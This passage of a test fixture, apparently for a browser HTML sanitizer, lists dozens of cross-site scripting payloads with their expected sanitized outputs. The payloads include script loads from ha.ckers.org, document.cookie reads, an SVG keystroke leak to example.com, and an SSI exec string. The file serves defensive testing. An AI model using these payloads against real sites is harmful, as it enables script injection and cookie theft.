observer="x"/>\r\n<handler id="y">alert(1)</handler>\r\n</svg>', 541 sanitized: "<html><head></head><body>\n\nalert(1)\n</body></html>", 542 }, 543 { 544 data: "<svg><style><img/src=x onerror=alert(1)// </b>", 545 sanitized: "<html><head></head><body></body></html>", 546 }, 547 { 548 data: "<svg>\n<image style='filter:url(\"data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>\")'>\n<!--\nSame effect with\n<image filter='...'>\n-->\n</svg>", 549 sanitized: "<html><head></head><body>\n\n\n</body></html>", 550 }, 551 { 552 data: '<math href="javascript:alert(1)">CLICKME</math>\r\n\r\n<math>\r\n<!-- up to FF 13 -->\r\n<maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction>\r\n\r\n<!-- FF 14+ -->\r\n<maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction>\r\n</math>', 553 sanitized: 554 '<html><head></head><body><math>CLICKME</math>\n\n<math>\n\n<maction actiontype="statusline#http://google.com">CLICKME</maction>\n\n\n<maction actiontype="statusline">CLICKME<mtext>http://http://google.com</mtext></maction>\n</math></body></html>', 555 }, 556 { 557 data: "<b>drag and drop one of the following strings to the drop box:</b>\r\n<br/><hr/>\r\njAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\nfeed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\nfeed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b>\r\n<br/><hr/>\r\nfeed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\n<div id=\"dropbox\" style=\"height: 360px;width: 500px;border: 5px solid #000;position: relative;\" ondragover=\"event.preventDefault()\">+ Drop Box +</div>", 558 sanitized: 559 "<html><head></head><body><b>drag and drop one of the following strings to the drop box:</b>\n<br><hr>\njAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\nfeed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\nfeed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b>\n<br><hr>\nfeed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\n<div id=\"dropbox\">+ Drop Box +</div></body></html>", 560 }, 561 { 562 data: '<!doctype html>\r\n<form>\r\n<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>\r\n<br>\r\n<input name="secret" type="password">\r\n</form>\r\n<!-- injection --><svg height="50px">\r\n<image xmlns:xlink="http://www.w3.org/1999/xlink">\r\n<set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" />\r\n<set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" />\r\n<set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" />\r\n<set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" />\r\n</image>\r\n</svg>', 563 sanitized: 564 "<!DOCTYPE html>\n<html><head></head><body>\n<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>\n<br>\n\n\n\n\n\n\n\n\n\n</body></html>", 565 }, 566 { 567 data: "<!-- `<img/src=xx:xx onerror=alert(1)//--!>", 568 sanitized: "<html><head></head><body></body></html>", 569 }, 570 { 571 data: "<xmp>\r\n<%\r\n</xmp>\r\n<img alt='%></xmp><img src=xx:x onerror=alert(1)//'>\r\n\r\n<script>\r\nx='<%'\r\n</script> %>/\r\nalert(2)\r\n</script>\r\n\r\nXXX\r\n<style>\r\n*['<!--']{}\r\n</style>\r\n-->{}\r\n*{color:red}</style>", 572 sanitized: 573 '<html><head></head><body>\n<%\n\n<img alt="%></xmp><img src=xx:x onerror=alert(1)//">\n\n %>/\nalert(2)\n\n\nXXX\n\n-->{}\n*{color:red}</body></html>', 574 }, 575 { 576 data: '<form action="" method="post">\r\n<input name="username" value="admin" />\r\n<input name="password" type="password" value="secret" />\r\n<input name="injected" value="injected" dirname="password" />\r\n<input type="submit">\r\n</form>', 577 sanitized: "<html><head></head><body>\n\n\n\n\n</body></html>", 578 }, 579 { 580 data: "<SCRIPT>alert('XSS');</SCRIPT>", 581 sanitized: "<html><head></head><body></body></html>", 582 }, 583 { 584 data: "'';!--\"<XSS>=&{()}", 585 sanitized: "<html><head></head><body>'';!--\"=&{()}</body></html>", 586 }, 587 { 588 data: "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>", 589 sanitized: "<html><head></head><body></body></html>", 590 }, 591 { 592 data: "<IMG SRC=\"javascript:alert('XSS');\">", 593 sanitized: "<html><head></head><body><img></body></html>", 594 }, 595 { 596 data: "<IMG SRC=javascript:alert('XSS')>", 597 sanitized: "<html><head></head><body><img></body></html>", 598 }, 599 { 600 data: "<IMG SRC=JaVaScRiPt:alert('XSS')>", 601 sanitized: "<html><head></head><body><img></body></html>", 602 }, 603 { 604 data: "<IMG SRC=javascript:alert("XSS")>", 605 sanitized: "<html><head></head><body><img></body></html>", 606 }, 607 { 608 data: "<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>", 609 sanitized: "<html><head></head><body><img></body></html>", 610 }, 611 { 612 data: "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", 613 sanitized: "<html><head></head><body><img></body></html>", 614 }, 615 { 616 data: "SRC=
<IMG 6;avascript:alert('XSS')>", 617 sanitized: "<html><head></head><body>SRC=\n<img></body></html>", 618 }, 619 { 620 data: "<IMG SRC=javascript:alert('XSS')>", 621 sanitized: "<html><head></head><body><img></body></html>", 622 }, 623 { 624 data: "<IMG SRC=javascript:alert('XSS')>", 625 sanitized: "<html><head></head><body><img></body></html>", 626 }, 627 { 628 data: "<IMG SRC=\"javascript:alert('XSS');\">", 629 sanitized: "<html><head></head><body><img></body></html>", 630 }, 631 { 632 data: "<IMG SRC=\"jav	ascript:alert('XSS');\">", 633 sanitized: "<html><head></head><body><img></body></html>", 634 }, 635 { 636 data: "<IMG SRC=\"jav
ascript:alert('XSS');\">", 637 sanitized: "<html><head></head><body><img></body></html>", 638 }, 639 { 640 data: "<IMG SRC=\"jav
ascript:alert('XSS');\">", 641 sanitized: "<html><head></head><body><img></body></html>", 642 }, 643 { 644 data: "<IMG SRC=\"  javascript:alert('XSS');\">", 645 sanitized: "<html><head></head><body><img></body></html>", 646 }, 647 { 648 data: '<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>', 649 sanitized: "<html><head></head><body></body></html>", 650 }, 651 { 652 data: "<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>", 653 sanitized: "<html><head></head><body></body></html>", 654 }, 655 { 656 data: "<IMG SRC=\"javascript:alert('XSS')\"", 657 sanitized: "<html><head></head><body></body></html>", 658 }, 659 { 660 data: "<SCRIPT>a=/XSS/", 661 sanitized: "<html><head></head><body></body></html>", 662 }, 663 { 664 data: "\\\";alert('XSS');//", 665 sanitized: "<html><head></head><body>\\\";alert('XSS');//</body></html>", 666 }, 667 { 668 data: '<INPUT TYPE="IMAGE" SRC="javascript:alert(\'XSS\');">', 669 sanitized: "<html><head></head><body></body></html>", 670 }, 671 { 672 data: "<BODY BACKGROUND=\"javascript:alert('XSS')\">", 673 sanitized: "<html><head></head><body></body></html>", 674 }, 675 { 676 data: "<BODY ONLOAD=alert('XSS')>", 677 sanitized: "<html><head></head><body></body></html>", 678 }, 679 { 680 data: "<IMG DYNSRC=\"javascript:alert('XSS')\">", 681 sanitized: "<html><head></head><body><img></body></html>", 682 }, 683 { 684 data: "<IMG LOWSRC=\"javascript:alert('XSS')\">", 685 sanitized: "<html><head></head><body><img></body></html>", 686 }, 687 { 688 data: "<BGSOUND SRC=\"javascript:alert('XSS');\">", 689 sanitized: "<html><head></head><body></body></html>", 690 }, 691 { 692 data: "<BR SIZE=\"&{alert('XSS')}\">", 693 sanitized: "<html><head></head><body><br></body></html>", 694 }, 695 { 696 data: '<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>', 697 sanitized: "<html><head></head><body></body></html>", 698 }, 699 { 700 data: '<LINK REL="stylesheet" HREF="javascript:alert(\'XSS\');">', 701 sanitized: "<html><head></head><body></body></html>", 702 }, 703 { 704 data: '<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">', 705 sanitized: "<html><head></head><body></body></html>", 706 }, 707 { 708 data: "<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>", 709 sanitized: "<html><head></head><body></body></html>", 710 }, 711 { 712 data: '<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">', 713 sanitized: "<html><head></head><body></body></html>", 714 }, 715 { 716 data: '<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>', 717 sanitized: "<html><head></head><body></body></html>", 718 }, 719 { 720 data: "<IMG SRC='vbscript:msgbox(\"XSS\")'>", 721 sanitized: "<html><head></head><body><img></body></html>", 722 }, 723 { 724 data: '<IMG SRC="mocha:[code]">', 725 sanitized: "<html><head></head><body><img></body></html>", 726 }, 727 { 728 data: '<IMG SRC="livescript:[code]">', 729 sanitized: "<html><head></head><body><img></body></html>", 730 }, 731 { 732 data: '<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(\'XSS\');">', 733 sanitized: "<html><head></head><body></body></html>", 734 }, 735 { 736 data: '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">', 737 sanitized: "<html><head></head><body></body></html>", 738 }, 739 { 740 data: '<META HTTP-EQUIV="Link" Content="<javascript:alert(\'XSS\')>; REL=stylesheet">', 741 sanitized: "<html><head></head><body></body></html>", 742 }, 743 { 744 data: '<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(\'XSS\');">', 745 sanitized: "<html><head></head><body></body></html>", 746 }, 747 { 748 data: "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>", 749 sanitized: "<html><head></head><body></body></html>", 750 }, 751 { 752 data: "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>", 753 sanitized: "<html><head></head></html>", 754 }, 755 { 756 data: "<TABLE BACKGROUND=\"javascript:alert('XSS')\">", 757 sanitized: "<html><head></head><body><table></table></body></html>", 758 }, 759 { 760 data: "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">", 761 sanitized: "<html><head></head><body><div></div></body></html>", 762 }, 763 { 764 data: "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">", 765 sanitized: "<html><head></head><body><div></div></body></html>", 766 }, 767 { 768 data: "<DIV STYLE=\"width: expression(alert('XSS'));\">", 769 sanitized: "<html><head></head><body><div></div></body></html>", 770 }, 771 { 772 data: "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>", 773 sanitized: "<html><head></head><body></body></html>", 774 }, 775 { 776 data: "<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">", 777 sanitized: "<html><head></head><body><img></body></html>", 778 }, 779 { 780 data: "<XSS STYLE=\"xss:expression(alert('XSS'))\">", 781 sanitized: "<html><head></head><body></body></html>", 782 }, 783 { 784 data: 'exp/*<XSS STYLE=\'no\\xss:noxss("*//*");', 785 sanitized: "<html><head></head><body>exp/*</body></html>", 786 }, 787 { 788 data: "<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>", 789 sanitized: "<html><head></head><body></body></html>", 790 }, 791 { 792 data: "<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>", 793 sanitized: '<html><head></head><body><a class="XSS"></a></body></html>', 794 }, 795 { 796 data: '<STYLE type="text/css">BODY{background:url("javascript:alert(\'XSS\')")}</STYLE>', 797 sanitized: "<html><head></head><body></body></html>", 798 }, 799 { 800 data: "<BASE HREF=\"javascript:alert('XSS');//\">", 801 sanitized: "<html><head></head><body></body></html>", 802 }, 803 { 804 data: '<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>', 805 sanitized: "<html><head></head><body></body></html>", 806 }, 807 { 808 data: "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>", 809 sanitized: "<html><head></head><body></body></html>", 810 }, 811 { 812 data: "getURL(\"javascript:alert('XSS')\")", 813 sanitized: 814 "<html><head></head><body>getURL(\"javascript:alert('XSS')\")</body></html>", 815 }, 816 { 817 data: 'a="get";', 818 sanitized: '<html><head></head><body>a="get";</body></html>', 819 }, 820 { 821 data: "<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas<![CDATA[cript:alert('XSS');\">", 822 sanitized: "<html><head></head><body></body></html>", 823 }, 824 { 825 data: '<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>', 826 sanitized: "<html><head></head><body></body></html>", 827 }, 828 { 829 data: "<HTML><BODY>", 830 sanitized: "<html><head></head><body></body></html>", 831 }, 832 { 833 data: '<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>', 834 sanitized: "<html><head></head><body></body></html>", 835 }, 836 { 837 data: "<!--#exec cmd=\"/bin/echo '<SCRIPT SRC'\"--><!--#exec cmd=\"/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'\"-->", 838 sanitized: "<html><head></head><body></body></html>", 839 }, 840 { 841 data: "<? echo('<SCR)';", 842 sanitized: "<html><head></head><body></body></html>", 843 }, 844 { 845 data: '<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(\'XSS\')</SCRIPT>">', 846 sanitized: "<html><head></head><body></body></html>", 847 }, 848 { 849 data: '<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(\'XSS\');+ADw-/SCRIPT+AD4-', 850 sanitized: 851 "<html><head> </head><body>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</body></html>", 852 }, 853 { 854 data: '<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>', 855 sanitized: "<html><head></head><body></body></html>", 856 }, 857 { 858 data: '<SCRIPT a=">" \'\' SRC="http://ha.ckers.org/xss.js"></SCRIPT>', 859 sanitized: "<html><head></head><body></body></html>", 860 }, 861 { 862 data: '<SCRIPT "a=\'>\'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>', 863 sanitized: "<html><head></head><body></body></html>", 864 }, 865 { 866 data: '<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>', 867 sanitized: "<html><head></head><body></body></html>", 868 }, 869 { 870 data: '<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC', 871 sanitized: "<html><head></head><body>PT SRC</body></html>", 872 }, 873 { 874 data: "", 875 sanitized: "<html><head></head><body></body></html>", 876 }, 877 { 878 data: "<dialog>allowed</dialog>", 879 sanitized: 880 "<html><head></head><body><dialog>allowed</dialog></body></html>", 881 }, 882 { 883 data: "<main>allowed</main>", 884 sanitized: "<html><head></head><body><main>allowed</main></body></html>", 885 }, 886 { 887 data: "<picture>allowed</picture>", 888 sanitized: 889 "<html><head></head><body><picture>allowed</picture></body></html>", 890 }, 891 { 892 data: "<template>allowed</template>", 893 sanitized: 894 "<html><head><template>allowed</template></head><body></body></html>", 895 }, 896 { 897 // traverse into HTML template elements 898 data: '<template><img src="x" onerror="alert(1)"></template>', 899 sanitized: 900 "<html><head><template><img></template></head><body></body></html>", 901 }, 902 { 903 // do not traverse into SVG template elements (that's not a thing) 904 data: "<svg><template></template></svg>", 905 sanitized: "<html><head></head><body></body></html>", 906 }, 907 { 908 data: "<svg><use href='http://example.com/test.svg'></svg>", 909 flags: 1, // ParserUtils.SanitizerAllowStyle 910 sanitized: "<html><head></head><body><svg><use></use></svg></body></html>", 911 }, 912 { 913 // fragments that reference the same document are allowed. 914 data: "<svg><use href='#x'></svg>", 915 flags: 1, // ParserUtils.SanitizerAllowStyle 916 sanitized: 917 '<html><head></head><body><svg><use href="#x"></use></svg></body></html>', 918 }, 919 { 920 data: '<svg><use xlink:href="http://example/#baz"/></svg>', 921 flags: 1, // ParserUtils.SanitizerAllowStyl, 922 sanitized: "<html><head></head><body><svg><use></use></svg></body></html>", 923 }, 924 ];